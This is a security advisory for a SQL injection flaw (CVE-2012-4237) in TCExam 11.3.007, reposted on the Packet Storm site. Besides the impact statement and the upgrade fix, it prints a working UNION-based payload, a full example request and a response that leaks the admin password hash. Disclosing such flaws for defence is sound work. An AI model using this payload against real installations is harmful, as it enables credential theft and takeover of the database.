what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TCExam 11.3.007 SQL Injection

TCExam 11.3.007 SQL Injection
Posted Aug 14, 2012
Authored by Chris Cooper | Site reactionpenetrationtesting.co.uk

TCExam Edit version 11.3.007 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2012-4237
SHA-256 | 06af1b2a6fb8ed7abd5d25d460237c12fee5dc2b4cf699e07621727d30f9fc9e

TCExam 11.3.007 SQL Injection

Change Mirror Download
/---------------------------\

| TCExam Edit SQL Injection |

\---------------------------/





Summary

=======



TCExam 11.3.007 is prone to a SQL injection flaw located in
tce_edit_answer.php and tce_edit_question.php. These files pass a
'subject_module_id' parameter into a SQL statement without satisfactory
sanitisation. An attacker with authoring permissions could leverage this
vulnerability to take full control of the database.



CVE number: CVE-2012-4237

Impact: High

Vendor homepage: http://www.tcexam.org/

Vendor notified: 06/08/2012

Vendor fixed: 06/08/2012

Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)



This advisory is posted at:



http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html





Affected Products

======== ========



Confirmed in TCExam 11.3.007. Prior versions may also be affected.





Details

=======



The 'subject_module_id' parameters in the tce_edit_answer.php and
tce_edit_question.php pages were found to be subject to a SQL injection
vulnerability. It was possible to inject arbitrary SQL statements into a
WHERE clause, retrieving information from the database via the page output.
The attacker must be authenticated as a valid user with a permission level
of 5 or above in order for the attack to be successful.



The following payload will extract the admin password hash (some characters
may need to be URL encoded):



999999.9 union all select (select
concat(0x7e,0x27,tce_users.user_password,0x27,0x7e) from `tcexam`.tce_users
where tce_users.user_name = CHAR(97,100,109,105,110) limit 0,1)
,0x0,0x0,0x0,0x0,0x0--



---

Example Request:

+---------------



GET
/TCExam/admin/code/tce_edit_answer.php?subject_module_id=999999.9+union+all+
select+%28select+concat%280x7e%2C0x27%2Ctce_users.user_password%2C0x27%2C0x7
e%29+from+%60tcexam%60.tce_users+where+tce_users.user_name+%3d+CHAR(97,100,1
09,105,110)+limit+0%2C1%29+%2C0x0%2C0x0%2C0x0%2C0x0%2C0x0--&question_subject
_id=3&answer_question_id=7 HTTP/1.1

Host: 192.168.0.6

Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php

Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df



---

Example Response:

+----------------



--- SNIP ---

<select name="question_subject_id" id="question_subject_id" size="0"
onchange="document.getElementById('form_answereditor').changesubject.value=1
; document.getElementById('form_answereditor').submit();" title="test
topic"> <option value="~'c574b5b09ab10f4f39ae9dce6d539cf0'~">1. -
[%00]</option> </select>

--- SNIP ---



Impact

======



An authenticated user with a permission level of 5 or higher could take full
control of the database, essentially allowing them to escalate their
privileges by either directly controlling the database, cracking an
administrator password or potentially changing their own permission level.
Furthermore, an attacker might be able to leverage this vulnerability in
order to further compromise the host machine.



Solution

========



Upgrade to TCExam 11.3.008.





Distribution

============



In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.



* bugtraq () securityfocus com

* full-disclosure () lists grok org uk



Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:



http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html



============================================================================
==



Reaction Information Security

Lombard House Business Centre,

Suite 117,

12-17 Upper Bridge Street,

Canterbury, Kent, CT1 2NF



Phone: +44 (0)1227 785050

Email: research () reactionis {dot} co {dot} uk

Web: http://www.reactionpenetrationtesting.co.uk

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close